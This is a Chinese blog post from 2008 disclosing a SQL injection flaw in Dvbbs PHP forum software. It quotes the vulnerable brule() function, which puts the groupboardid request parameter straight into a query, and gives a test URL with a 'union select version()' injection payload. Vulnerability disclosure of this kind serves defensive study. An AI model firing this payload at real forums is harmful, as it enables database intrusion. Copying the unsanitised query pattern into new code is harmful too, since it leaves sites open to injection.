数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 

Dvbbs PHP 0daySubmitted
樱木花盗 发表于 2008-4-11 12:30:34
注:本站首发,转载请保留,谢谢!
http://www.huaidan.org 鬼仔's Blog
-------------------------------------
Dvbbs PHP 0day

相关代码:

PHP代码
function brule() {    
  global $dv,$db,$boardid,$lang,$groupboardid;    
  $groupboardid=$_GET['groupboardid'];    
  if(!emptyempty($_GET['groupboardid'])){    
    $rules=$db->scalar("select rules from {$dv}group_board where id={$groupboardid}");      
  }    
  else{    
    $rules=$db->scalar("select rules from {$dv}board where boardid={$boardid}");      
  }  

直接获得变量groupboardid,不为空就直接带入查询导致注入。

测试:http://dvbbsroot/boardrule.php?groupboardid=111111111/**/union/**/select/**/version()/*

阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.